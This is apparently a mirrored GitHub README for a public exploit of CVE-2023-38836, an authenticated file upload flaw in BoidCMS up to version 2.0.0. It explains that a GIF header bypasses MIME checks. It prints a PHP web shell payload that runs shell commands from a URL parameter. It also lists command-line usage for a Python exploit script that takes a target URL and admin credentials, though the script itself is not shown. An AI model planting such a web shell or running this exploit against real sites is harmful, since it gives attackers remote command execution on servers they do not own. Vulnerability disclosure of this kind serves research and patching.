Giters

1337kid / CVE-2023-38836

Exploit for file upload vulnerability in BoidCMS version <=2.0.0

Geek Repo:Geek Repo

Github PK Tool:Github PK Tool

CVE-2023-38836 Exploit

File Upload vulnerability in BoidCMS v.2.0.0 allows an authenticated attacker to upload a file with dangerous type (CWE-434).
To exploit, an attacker could add a GIF header to bypass MIME type checks.

GIF89a;
<?php system($_GET["cmd"]); ?>

Usage

usage: exp.py [-h] [-u URL] [-l USER] [-p PASSWD]

Exploit for CVE-2023-38836

options:
  -h, --help            show this help message and exit
  -u URL, --url URL     website url
  -l USER, --user USER  admin username
  -p PASSWD, --passwd PASSWD
                        admin password

About

Exploit for file upload vulnerability in BoidCMS version <=2.0.0

License:GNU General Public License v3.0

Languages

Language:Python 100.0%